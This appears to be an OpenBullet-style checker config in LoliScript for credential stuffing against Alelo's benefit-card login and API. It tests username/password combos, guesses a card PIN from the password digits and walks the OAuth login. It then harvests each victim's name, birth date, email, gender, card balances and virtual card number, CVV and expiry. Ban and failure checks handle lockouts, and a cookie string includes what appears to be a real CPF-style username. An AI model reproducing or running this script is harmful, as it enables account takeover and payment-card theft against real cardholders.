Untitled

FUNCTION Replace "[a-zA-z]+" "" UseRegex=TRUE "<PASS>" -> VAR "4DIG" 

FUNCTION Substring "0" "4" "<4DIG>" -> VAR "4DIG1" 

FUNCTION Length "<4DIG1>" -> VAR "VER" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<VER>" EqualTo "4" 
  KEYCHAIN Failure OR 
    KEY "<VER>" GreaterThan "4" 
    KEY "<VER>" LessThan "4" 

FUNCTION Substring "0" "1" "<PASS>" -> VAR "PRIM1" 

FUNCTION RegexMatch "[a-z]" "<PRIM1>" -> VAR "PRIM" 

FUNCTION ToUppercase "<PRIM>" -> VAR "UPP" 

FUNCTION RegexMatch "[^<PRIM>\\d][a-z]+" "<PASS>" -> VAR "RESTO" 

FUNCTION Replace "<PRIM><RESTO>" "<UPP><RESTO>" UseRegex=TRUE "<PASS>" -> VAR "SENHA" 

SET DATA "<USER>:<SENHA>"

#GET_TOKEN00 REQUEST GET "https://login.alelo.com.br/oauth2/authorize?response_type=code&client_id=81c425d1-7d8d-435b-b24f-97064db915c9&scope=openid profile&redirect_uri=https://www.meualelo.com.br&response_mode=query&code_challenge_method=S256&code_challenge=F3T7zKSxD7DE1-LenIB7skBBLQP7jTQCRd3WzH5XpDw&state=request_0" 
  
  HEADER "Host: login.alelo.com.br" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0" 
  HEADER "Accept: */*" 
  HEADER "Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Content-Type: text/plain;charset=UTF-8" 
  HEADER "Content-Length: 4818" 
  HEADER "Origin: https://login.alelo.com.br" 
  HEADER "Connection: keep-alive" 
  HEADER "Referer: https://login.alelo.com.br/authenticationendpoint/login.do?client_id=81c425d1-7d8d-435b-b24f-97064db915c9&code_challenge=F3T7zKSxD7DE1-LenIB7skBBLQP7jTQCRd3WzH5XpDw&code_challenge_method=S256&commonAuthCallerPath=%2Foauth2%2Fauthorize&forceAuth=false&passiveAuth=false&redirect_uri=https%3A%2F%2Fwww.meualelo.com.br&response_mode=query&response_type=code&scope=openid+profile&state=request_0&tenantDomain=carbon.super&sessionDataKey=98252d08-4991-4f03-a3d8-7a676f960064&relyingParty=81c425d1-7d8d-435b-b24f-97064db915c9&type=oidc&sp=81c425d1-7d8d-435b-b24f-97064db915c9&isSaaSApp=false&authenticators=BasicAuthenticator%3ALOCAL" 
  HEADER "Cookie: JSESSIONID=BE091ABF75F7B12AC0023CFF474D917917660F2E19E305046CB5852F48725B69180BF35F40BF89E7FB6B91AB554884B4B0249F5BA39991A80832E9CB7BAE1B7CA32569A1CB771E4127A9E8143FD7FB59CC39EBC75DBE8E2110F1C891B4E6FE471F87A20650034CC21439932476BFBEBF532DF341761D692457A82F8067AB0800; _gcl_au=1.1.1595964053.1669880855; OptanonConsent=isIABGlobal=false&datestamp=Thu+Dec+01+2022+05%3A45%3A56+GMT-0300+(Hor%C3%A1rio+Padr%C3%A3o+de+Bras%C3%ADlia)&version=6.27.0&hosts=&consentId=ce406285-f58a-4671-824b-03d9e9f39c2c&interactionCount=1&landingPath=NotLandingPage&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CBG22%3A0%2CC0004%3A0%2CC0005%3A0&AwaitingReconsent=false; _fbp=fb.2.1669880869301.255368387; AWSALB=/vgf3OGeIpCovmToEXUjY0emEouvDeXnVArMCLFiKPY254lkeJJIlsZ9O3WIJHO2TZKJb2R9ohJxWqeKTcKy5bBCS1g945zN9mXuEITsrkhbkNEohrcZIkv8WKQa; AWSALBCORS=/vgf3OGeIpCovmToEXUjY0emEouvDeXnVArMCLFiKPY254lkeJJIlsZ9O3WIJHO2TZKJb2R9ohJxWqeKTcKy5bBCS1g945zN9mXuEITsrkhbkNEohrcZIkv8WKQa; _ga=GA1.3.1986641980.1669880944; _gid=GA1.3.48554669.1669880944; dtCookie=v_4_srv_3_sn_B6C8176349D53279D30855240E5A364A_perc_100000_ol_0_mul_1_app-3Aabe9488962c3654b_0; rxVisitor=1669929837468QUAQRQ5UL5NO6EDJPIVR778CIGH5537B; dtPC=3$142770739_414h-vORWCQEWCRQIFURPFUKAWWKHQVHBRBWPD-0e0; rxvt=1669944571974|1669941279650; dtLatC=1; dtSa=-; _gat_UA-2506361-5=1; _gat_gtag_UA_2506361_5=1" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "TE: trailers" 

#challenge PARSE "<ADDRESS>" LR "code_challenge=" "&" -> VAR "challenge" 

#SS PARSE "<ADDRESS>" LR "sessionDataKey=" "&" -> VAR "SS" 

#LOGIN REQUEST POST "https://login.alelo.com.br/commonauth" 
  CONTENT "usernameUserInput=<USER>&username=<USER>%40carbon.super&password=<SENHA>&sessionDataKey=<SS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Verifique seu CPF e sua senha e tente novamente." 
    KEY "<ADDRESS>" Contains "authFailureMsg=login.fail.message" 
    KEY "foi temporariamente bloqueado, por favor verifique seu e-mail" 
  KEYCHAIN Success OR 
    KEY "<COOKIES{*}>" Contains "opbs" 

#commonAuthId PARSE "<COOKIES(commonAuthId)>" LR "" "" -> VAR "commonAuthId" 

#opbs PARSE "<COOKIES(opbs)>" LR "" "" -> VAR "opbs" 

#C PARSE "<ADDRESS>" LR "/?code=" "&" -> VAR "C" 

#GET_TOKEN01 REQUEST POST "https://login.alelo.com.br/oauth2/token" 
  CONTENT "client_id=81c425d1-7d8d-435b-b24f-97064db915c9&code=<C>&grant_type=authorization_code&redirect_uri=https://www.meualelo.com.br&code_verifier=LRy_zVYELaH5aqkH6xQGFJZmTPzuZ-DPtYaZBCiMP2E" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: login.alelo.com.br" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Content-Length: 217" 
  HEADER "Referer: https://www.meualelo.com.br/" 
  HEADER "Origin: https://www.meualelo.com.br" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: cross-site" 
  HEADER "Connection: keep-alive" 
  HEADER "Cookie: _gcl_au=1.1.1595964053.1669880855; _fbp=fb.2.1669880869301.255368387; AWSALB=6npyaz5NwB9S73t+3ABhGj2CaoSX6S3OXjbmbQr7yAIASZ0P2qq0fcINJNrxzl6bbJWa7CMbi0uGMertYz5qzaoqoj9iIAkYy33ixkgNBqS9dNf9kwZ8rnqaq3ld; AWSALBCORS=6npyaz5NwB9S73t+3ABhGj2CaoSX6S3OXjbmbQr7yAIASZ0P2qq0fcINJNrxzl6bbJWa7CMbi0uGMertYz5qzaoqoj9iIAkYy33ixkgNBqS9dNf9kwZ8rnqaq3ld; _ga=GA1.3.1986641980.1669880944; _gid=GA1.3.48554669.1669880944; dtCookie=v_4_srv_3_sn_B6C8176349D53279D30855240E5A364A_perc_100000_ol_0_mul_1_app-3Aabe9488962c3654b_0; rxVisitor=1669929837468QUAQRQ5UL5NO6EDJPIVR778CIGH5537B; dtPC=3$143791919_682h-vORWCQEWCRQIFURPFUKAWWKHQVHBRBWPD-0e0; rxvt=1669945905021|1669941279650; dtLatC=2; dtSa=false%7CC%7C11%7CENTRAR%7Cj3.6.0%7C1669944105011%7C143791919_682%7Chttps%3A%2F%2Flogin.alelo.com.br%2Fauthenticationendpoint%2Flogin.do%3Fclient_5Fid%3D81c425d1-7d8d-435b-b24f-97064db915c9%26code_5Fchallenge%3DF3T7zKSxD7DE1-LenIB7skBBLQP7jTQCRd3WzH5XpDw%26code_5Fchallenge_5Fmethod%3DS256%26commonAuthCallerPath%3D_252Foauth2_252Fauthorize%26forceAuth%3Dfalse%26passiveAuth%3Dfalse%26redirect_5Furi%3Dhttps_253A_252F_252Fwww.meualelo.com.br%26response_5Fmode%3Dquery%26response_5Ftype%3Dcode%26scope%3Dopenid%2Bprofile%26state%3Drequest_5F0%26tenantDomain%3Dcarbon.super%26sessionDataKey%3D98252d08-4991-4f03-a3d8-7a676f960064%26relyingParty%3D81c425d1-7d8d-435b-b24f-97064db915c9%26type%3Doidc%26sp%3D81c425d1-7d8d-435b-b24f-97064db915c9%26isSaaSApp%3Dfalse%26authenticators%3DBasicAuthenticator_253ALOCAL%26authFailure%3Dtrue%26authFailureMsg%3Dlogin.fail.message%26failedUsername%3D29956390020_2540carbon.super%26errorCode%3D17001%7C%7C%7C%7C; _gat_UA-2506361-5=1; commonAuthId=<commonAuthId>; opbs=<opbs>" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Ban OR 
    KEY "<RESPONSECODE>" Contains "403" 
    KEY "<RESPONSECODE>" Contains "404" 

#access_token PARSE "<SOURCE>" JSON "access_token" -> VAR "access_token" 

#id_token PARSE "<SOURCE>" JSON "id_token" -> VAR "id_token" 

#GET_INFO REQUEST GET "https://api.meualelo.com.br/meualelo-web-api/s/user" 
  
  HEADER "Host: api.meualelo.com.br" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Referer: https://www.meualelo.com.br/" 
  HEADER "AUTH_TYPE: IS-ALELO" 
  HEADER "FNP: 53470fdac5fda003b3bcbe40e6ab23b3" 
  HEADER "APPLICATION: WEB" 
  HEADER "ID_TOKEN: <id_token>" 
  HEADER "Origin: https://www.meualelo.com.br" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Authorization: Bearer <access_token>" 
  HEADER "Connection: keep-alive" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Ban OR 
    KEY "<RESPONSECODE>" Contains "403" 
    KEY "<RESPONSECODE>" Contains "404" 

#firstName PARSE "<SOURCE>" JSON "firstName" -> VAR "firstName" 

!#lastName PARSE "<SOURCE>" JSON "firstName" -> VAR "lastName" 

!#NOME FUNCTION ToUppercase "<firstName> <lastName>" -> CAP "NOME" 

#birthDate PARSE "<SOURCE>" JSON "birthDate" -> VAR "birthDate" 

#email PARSE "<SOURCE>" JSON "email" CreateEmpty=FALSE -> CAP "email" 

#SEXO PARSE "<SOURCE>" JSON "gender" CreateEmpty=FALSE -> CAP "SEXO" 

#GET_SALDO REQUEST GET "https://api.meualelo.com.br/meualelo-web-api/s/v2/card" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Host: api.meualelo.com.br" 
  HEADER "Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Referer: https://www.meualelo.com.br/" 
  HEADER "AUTH_TYPE: IS-ALELO" 
  HEADER "FNP: 53470fdac5fda003b3bcbe40e6ab23b3" 
  HEADER "APPLICATION: WEB" 
  HEADER "ID_TOKEN: <id_token>" 
  HEADER "Origin: https://www.meualelo.com.br" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Authorization: Bearer <access_token>" 
  HEADER "Connection: keep-alive" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Ban OR 
    KEY "<RESPONSECODE>" Contains "403" 
    KEY "<RESPONSECODE>" Contains "404" 

#SALDOS PARSE "<SOURCE>" JSON "value" Recursive=TRUE CreateEmpty=FALSE -> CAP "SALDOS" 

#CARTÕES PARSE "<SOURCE>" JSON "type" Recursive=TRUE CreateEmpty=FALSE -> CAP "CARTÕES" 

#IDCARD PARSE "<SOURCE>" LR "\"},\"id\":\"" "\",\"name\":\"" -> VAR "IDCARD" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Success OR 
    KEY "<CARTÕES>" Contains "ALELO_TUDO" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<CARTÕES>" DoesNotContain "ALELO_TUDO" 

#GET_CARD REQUEST POST "https://api.meualelo.com.br/meualelo-web-api/s/virtual-card/<IDCARD>" 
  CONTENT "{\"pin\":\"<4DIG1>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: api.meualelo.com.br" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Referer: https://www.meualelo.com.br/" 
  HEADER "AUTH_TYPE: IS-ALELO" 
  HEADER "FNP: 53470fdac5fda003b3bcbe40e6ab23b3" 
  HEADER "APPLICATION: WEB" 
  HEADER "ID_TOKEN: <id_token>" 
  HEADER "Origin: https://www.meualelo.com.br" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Authorization: Bearer <access_token>" 
  HEADER "Connection: keep-alive" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<RESPONSECODE>" Contains "200" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<RESPONSECODE>" Contains "500" 
  KEYCHAIN Ban OR 
    KEY "402" 

PARSE "<SOURCE>" JSON "cardNumber" CreateEmpty=FALSE -> CAP "CC" 

PARSE "<SOURCE>" JSON "cvv" CreateEmpty=FALSE -> CAP "CVV" 

PARSE "<SOURCE>" JSON "expirationDate" CreateEmpty=FALSE -> CAP "VALIDADE"